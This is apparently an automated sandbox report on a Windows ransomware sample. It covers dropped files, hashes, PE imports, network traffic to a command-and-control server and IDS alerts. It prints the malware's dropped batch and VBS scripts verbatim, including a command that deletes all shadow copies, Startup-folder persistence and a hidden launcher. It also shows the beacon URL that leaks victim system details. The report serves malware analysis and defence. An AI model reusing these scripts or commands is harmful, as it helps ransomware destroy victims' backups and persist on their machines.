                                    Preview:$0i73LmNE8fubdmAhIBOKOe+dPubQaK6HX4VBI92/QIfSLuu4OvksM5GE/+kd+12Z319zHvOJ34w+Jc7tzsy2OszP8AoKc0yFbCl2LpYOly8jK4wq+9QpGQHb/p7s1tL5oOGqsZSI8EFO1NaUJwhDJfsFPnKgiQx1KTsfO3dnmyfZAoK6fQJeaxlk78LwXZRHSz9yH9vwq6t3YleZoXXXqGG+7kW9+5QhwUipUzysvYKD3GrDuuCZ72G8CrIbQ58XAylXEhIT1BxZceNitdbL3+DN/k27WGIyEf78tdmb5LlhhtrMNjEtPE6tL0vd4SfEck8DuiRgxV32/ZKl/5ekLyg==$1krWG/UZb92gbueruec3KBW0RIEfEoZ27e9/3W0TZ2Ij8Db9pS9f0/ifREAOmfDuefXqVQNY31vcM+dHXQoU9ylw6jIC77P/WAi+Nk7pkRT0ydvAq2DsdWg8MmtnvJFfEOEf2J3A6n2FsP15T6h78Y5nkWnelBFRD82ij9oZpHxZwo0AIiwf5NhRSWgpiuL0y+6KBzWMHNtMSw3mVzaUrNc1FAGiodS2qRzXLgDYtD5J9Iz2iMz5Z/dm4TESlGPr1Kjcmph190cIffFnfGGnrCh6TXisImuN+TvVgPrUU+eJAmL2Z/gwVZ03WJjRARckN5sJ/VIWgGGRife6BOaZn2Q==$2iq4R75uJw+IsoSSNTI1Por9gxu0U3YqkfOnqVB1EuXKwjFCU8bxNAk+knd8DXW7Al1hJ8sViJdtGr5k7dXk1lVPpC94OOzQASBbkOQn55VLVBsRAy2UVaJAhJc+NSHkz8NLAb8BJ5845hHxkE6x2+2V2XcXAW6nkyhQl2DOGwjC8hsMsAcMWsId5UvXF+b/EtSpKzyusowPvNW16dGKR0xOK18bePnKloaiL5WFNfa3lpBn/HvK8v3NAbIquUdysaSvK7jVzgIftTZlJjrgcNy5OY427VauB5KkTabC1FTT1nTJqEQ

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1260544
                                    Entropy (8bit):6.589860058604123
                                    Encrypted:false
                                    SSDEEP:24576:ndoamK7fChNrFR8o5Ed41ENk/zxNPBcKamSy+Oy3qLP9fpxDBhQXkZGc:6a7yNrFR+u1dxNPBcZy6qJfpdBhQXaGc
                                    MD5:F383DB0B947E0BCE25A542DD7FC11139
                                    SHA1:2AE37FDA200D51610FBE6CAD6DDE08BBBB802A0A
                                    SHA-256:2BF6FEB23CE675CAD218C51153A8577D35DA7E6B33466D1AA8E63BA69C66295D
                                    SHA-512:3AFD8627B3A50EDD13B5248E01B7F1EEC4A2694BDB91B290B1CFD6D22B496E7AE9A5DA49CE2F8CC3E8F514515C7E356D595525B4E6412932C4893C68E7059EE9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 76%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L....o.f............................1........0....@.......................................@..........................................................................V..8....................W.......V..@............0..(............................text............................... ..`.rdata.......0......."..............@..@.data...x...........................@....rsrc................b..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\AppData\S-2153.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):138
                                    Entropy (8bit):4.970414275542141
                                    Encrypted:false
                                    SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                    MD5:82A528CBF39B8EA7E2982E7B2305204C
                                    SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                    SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                    SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                    Malicious:true
                                    Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)

                                    C:\Users\user\AppData\S-6748.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1855
                                    Entropy (8bit):5.3649075450209125
                                    Encrypted:false
                                    SSDEEP:48:NKs+0hnuYWnui9Nzq5uhnuYWnuiGhnuYZeXknc4hg0hLdY:75kYliHqIkYliGkYZeXWBJnY
                                    MD5:011CF1246EBDF1AB2DCD67ACA77E90D3
                                    SHA1:D390F23D29A3D833B1CC78DC305A33AB88240B7D
                                    SHA-256:192F8E53FD09816976F95AC8139C7697E4D66D9FBBA2B07FA9EE1EAB8FA96EE1
                                    SHA-512:BEF8BBC307EF0950713B34F7B876E171EC458359EB79801F5FD73E13244524FE82E5FA3C710962627C3E0E8FF83178DC3A4D1E03DA1DF58D9E88D798469C2ECB
                                    Malicious:true
                                    Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv 2>NUL | find /I "8AbMCL2dxM.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv 2>NUL | find /I "8AbMCL2dxM.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"

                                    C:\Users\user\AppData\S-8459.vbs

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):686
                                    Entropy (8bit):5.1743757294368
                                    Encrypted:false
                                    SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                    MD5:ED7A274FF8AC640416952BFB5D6C927A
                                    SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                    SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                    SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                    Malicious:true
                                    Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If

                                    C:\Windows\SysMain.sys

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with very long lines (417), with no line terminators
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.873176961754405
                                    Encrypted:false
                                    SSDEEP:12:BwSxYnPklvckiHNNir4O1l63VPoXy7jQRe8Xn:B7enPVfNNeT63VPuy7jQ7X
                                    MD5:8E5FDA3A7FFC1FC9884BB6AE5895DECE
                                    SHA1:0C2FF5E88F9D11F6D70CD355048C044A238348FC
                                    SHA-256:B2561E16A51792242FD070E3DA48D8980A60B8A74B9652F15B495B3432B641DC
                                    SHA-512:2D7775C893AC69BD863D31C3B998C9A0EBE5D55BAF3808C9EF05E4A217C0CCEF9A84372208421CEA6CC150D052C2520E3D874F4484632B672751FBB11105C0D6
                                    Malicious:true
                                    Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAw61oFhdbzq68hx+r1OCsWC5eGJNlJbD+jarY9KfmFomcAXdY2Ly2+y54DOn8cC5YlQRC/v5V0S2HI60JlTIrTDcbwm+lPvEiImGnplemE4bLQbzqyoI/frw+VJ+r1cjT81E3bSmS388gSb6J8Nl3hajCKRIzhOZULLDxsnuKFxnnlj9h1ew0OrT3waCymg7Tdr/kaF6QMOCNzAgFtL/chNy6ehLq17pnnO3Kd0D1Lk/nccKS8ZClO8xlOoVaP5oW0U02sYUUjQMhc5G0jpMUA2hY0/x7Pi2uQTGl2e9eCnTlqMZDLZju0tN3yi7CSgrDFS1nBpRhhrJm/b4016A/qQIBEQ==p2h677H75u4g8.1UIh2gq

                                    \Device\Null

                                    Download File
                                    Process:C:\Windows\SysWOW64\find.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):50
                                    Entropy (8bit):4.334177320667442
                                    Encrypted:false
                                    SSDEEP:3:QomiHHSJXpdiupJEIv:Qom77pqS
                                    MD5:756806A34DDDC8D0B45E5470B59EA766
                                    SHA1:728F13AD9CFC18FB10C947E62D7DD9CA46BDC024
                                    SHA-256:119D5F188D2E4E1A4E0E2B33876C94D110028805D79578E0B7BF28A13524CC08
                                    SHA-512:7811C50BD4847A321A697D9D003C902F8114196886228045A1A784B59A8F7DA13AA1B33FC068550B6015B9E80A5D9626B8F6E778DEC4453BF6F7A53DED9F8CA8
                                    Malicious:false
                                    Preview:"8AbMCL2dxM.exe","7152","Console","1","15'492 K"..

                                    Static File Info

                                    General

                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                    Entropy (8bit):6.589860058604123
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:8AbMCL2dxM.exe
                                    File size:1'260'544 bytes
                                    MD5:f383db0b947e0bce25a542dd7fc11139
                                    SHA1:2ae37fda200d51610fbe6cad6dde08bbbb802a0a
                                    SHA256:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d
                                    SHA512:3afd8627b3a50edd13b5248e01b7f1eec4a2694bdb91b290b1cfd6d22b496e7ae9a5da49ce2f8cc3e8f514515c7e356d595525b4e6412932c4893c68e7059ee9
                                    SSDEEP:24576:ndoamK7fChNrFR8o5Ed41ENk/zxNPBcKamSy+Oy3qLP9fpxDBhQXkZGc:6a7yNrFR+u1dxNPBcZy6qJfpdBhQXaGc
                                    TLSH:9C45BD207642C132D56181B05E7CFB9AD0ADBC384F758ACBB3C46B2E5A315D25E36E63
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x491731
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows cui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66006F02 [Sun Mar 24 18:20:50 2024 UTC]
                                    TLS Callbacks:0x490d70
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:f527e8080fac9432953c548a4f7317af

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F18B9266A37h
                                    jmp 00007F18B9265BA9h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    cmp cl, 00000040h
                                    jnc 00007F18B9265D47h
                                    cmp cl, 00000020h
                                    jnc 00007F18B9265D38h
                                    shrd eax, edx, cl
                                    shr edx, cl
                                    ret
                                    mov eax, edx
                                    xor edx, edx
                                    and cl, 0000001Fh
                                    shr eax, cl
                                    ret
                                    xor eax, eax
                                    xor edx, edx
                                    ret
                                    int3
                                    push esi
                                    mov eax, dword ptr [esp+14h]
                                    or eax, eax
                                    jne 00007F18B9265D5Ah
                                    mov ecx, dword ptr [esp+10h]
                                    mov eax, dword ptr [esp+0Ch]
                                    xor edx, edx
                                    div ecx
                                    mov ebx, eax
                                    mov eax, dword ptr [esp+08h]
                                    div ecx
                                    mov esi, eax
                                    mov eax, ebx
                                    mul dword ptr [esp+10h]
                                    mov ecx, eax
                                    mov eax, esi
                                    mul dword ptr [esp+10h]
                                    add edx, ecx
                                    jmp 00007F18B9265D79h
                                    mov ecx, eax
                                    mov ebx, dword ptr [esp+10h]
                                    mov edx, dword ptr [esp+0Ch]
                                    mov eax, dword ptr [esp+08h]
                                    shr ecx, 1
                                    rcr ebx, 1
                                    shr edx, 1
                                    rcr eax, 1
                                    or ecx, ecx
                                    jne 00007F18B9265D26h
                                    div ebx
                                    mov esi, eax
                                    mul dword ptr [esp+14h]
                                    mov ecx, eax
                                    mov eax, dword ptr [esp+10h]
                                    mul esi
                                    add edx, ecx
                                    jc 00007F18B9265D40h
                                    cmp edx, dword ptr [esp+0Ch]
                                    jnbe 00007F18B9265D3Ah
                                    jc 00007F18B9265D41h
                                    cmp eax, dword ptr [esp+08h]
                                    jbe 00007F18B9265D3Bh
                                    dec esi
                                    sub eax, dword ptr [esp+10h]
                                    sbb edx, dword ptr [esp+14h]
                                    xor ebx, ebx
                                    sub eax, dword ptr [esp+08h]
                                    sbb edx, dword ptr [esp+0Ch]
                                    neg edx
                                    neg eax
                                    sbb edx, 00000000h
                                    mov ecx, edx
                                    mov edx, ebx
                                    mov ebx, ecx
                                    mov ecx, eax
                                    mov eax, esi
                                    pop esi
                                    retn 0010h
                                    int3
                                    int3
                                    int3

                                    Rich Headers

                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x11dac40xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1300000x1e0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1310000xd6d8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1056c00x38.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x10579c0x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1056f80x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xe30000x328.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xe1dd60xe1e00cd9d64b742fb4b7fe56ff7d10a8165cdFalse0.459598306931378data6.6440565404145735IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0xe30000x3bd080x3be006e18c61b78256b13c16a8bec1d98d4eaFalse0.3939848643006263data5.012794360955865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x11f0000x107780x8200ce22c5eef0d11dddf7c37e1a946c9b5cFalse0.1565204326923077data4.831725870753727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1300000x1e00x200319e7ac1640c4d053129c81ac0038351False0.52734375data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1310000xd6d80xd800655312fd133ef279042aa4f35584fb34False0.5692455150462963data6.57307515906302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0x1300600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                    Imports

                                    DLLImport
                                    KERNEL32.dllSleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
                                    USER32.dllEnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
                                    ADVAPI32.dllCryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
                                    SHELL32.dllShellExecuteW
                                    WS2_32.dllhtons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
                                    SHLWAPI.dllPathIsNetworkPathA
                                    NETAPI32.dllNetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
                                    WININET.dllHttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-06T13:39:10.708832+01002045821ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity1192.168.2.649742185.147.34.533586TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 6, 2024 13:39:24.301135063 CET4973680192.168.2.6104.26.12.205
                                    Dec 6, 2024 13:39:24.421325922 CET8049736104.26.12.205192.168.2.6
                                    Dec 6, 2024 13:39:24.421413898 CET4973680192.168.2.6104.26.12.205
                                    Dec 6, 2024 13:39:24.421777010 CET4973680192.168.2.6104.26.12.205
                                    Dec 6, 2024 13:39:24.541579962 CET8049736104.26.12.205192.168.2.6
                                    Dec 6, 2024 13:39:25.525494099 CET8049736104.26.12.205192.168.2.6
                                    Dec 6, 2024 13:39:25.525551081 CET4973680192.168.2.6104.26.12.205
                                    Dec 6, 2024 13:39:25.568466902 CET497423586192.168.2.6185.147.34.53
                                    Dec 6, 2024 13:39:25.688294888 CET358649742185.147.34.53192.168.2.6
                                    Dec 6, 2024 13:39:25.688361883 CET497423586192.168.2.6185.147.34.53
                                    Dec 6, 2024 13:39:25.688416004 CET497423586192.168.2.6185.147.34.53
                                    Dec 6, 2024 13:39:25.808204889 CET358649742185.147.34.53192.168.2.6
                                    Dec 6, 2024 13:39:25.808221102 CET358649742185.147.34.53192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 6, 2024 13:39:24.156151056 CET6177853192.168.2.61.1.1.1
                                    Dec 6, 2024 13:39:24.294003963 CET53617781.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 6, 2024 13:39:24.156151056 CET192.168.2.61.1.1.10xafaeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 6, 2024 13:39:12.879983902 CET1.1.1.1192.168.2.60x3cc2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Dec 6, 2024 13:39:12.879983902 CET1.1.1.1192.168.2.60x3cc2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                    Dec 6, 2024 13:39:24.294003963 CET1.1.1.1192.168.2.60xafaeNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                    Dec 6, 2024 13:39:24.294003963 CET1.1.1.1192.168.2.60xafaeNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                    Dec 6, 2024 13:39:24.294003963 CET1.1.1.1192.168.2.60xafaeNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • api.ipify.org
                                    • 185.147.34.53

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649736104.26.12.205807152C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 6, 2024 13:39:24.421777010 CET82OUTGET / HTTP/1.1
                                    Accept: text/*
                                    User-Agent: YourUserAgent
                                    Host: api.ipify.org
                                    Dec 6, 2024 13:39:25.525494099 CET429INHTTP/1.1 200 OK
                                    Date: Fri, 06 Dec 2024 12:39:25 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: keep-alive
                                    Vary: Origin
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 8edc56af7e2c80cd-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                    Data Ascii: 8.46.123.228


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.649742185.147.34.5335867152C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 6, 2024 13:39:25.688416004 CET2121OUTGET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aI4Dmwj4IAGsj1kBSGMcYydlQMVc9w0JoZmoaumhEXx06wC+fRSdEFpm5V6oWMp3tLPriQk05mszsyPy92zYenvnwEOpE5Cu5ynerWWnZRuY9JoBD7XQlmkj3dwcDaoB47TXLfKI9BVaKCyncaMp6B+5hpDTp/Voi1+nc81kqofSdhx+EmMJCDlQwjNLFyzVc6cN65bHpqoaELtCxFI079gXBCFsVljPKykMPlOE3C25nMWauaceeMu3QU7npybPaQYsB6QbzSUgY7T7z6JERI/gqMedNN4IYFtVQO/k2DgXYnXNHAnDRK9Z9LGqeYeHaeHuHllFjnHKE1DgIm6bZBGywl5BQ42uizHVtOKzNx+crjNEfSqeRAZ/AoyLX8dp9ntkCgWu/DNPGqfoTreXwIvnXcjuDzUrmajt76h+VO6YItix4AnTzd01lB2qCSH03T5gm67zlpLj0FhRUiTvrqP2NqDoiew5Ae6uW1wsBplqTyjoqe//Fub/uYviJB+iMJ7x236hVo/mhbRTTaxhRSNAyFzkbSOkxQDaFjT/Hs+La5BMaXZ714KdOWoxkMtmO7S03fKLsJKCsMVLWcGlGGGsmb9vjTXoD+pAgERAoIBABQkrJjcwevdSBz391Xp85+qa5GWs9LwVnB3O/sRSKBwDEtx7ssEXiFi5rYJBymqawBH99Z8EF0P+xZ+/TjFKhqrUeqajT7zLOzzdue2Mvp7DWTigZTYs7Z1QqbUM5I+FdGEmId4/Eu+u8tbJMm8CIn+jHUrSRFyEDHG67RBbFUzbWR60rQ5hQWwWO5nsOF/MoSImnAlisIiGYXZ3oCbEikPfqWPirXSM [TRUNCATED]
                                    Host: 185.147.34.53
                                    Connection: close


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

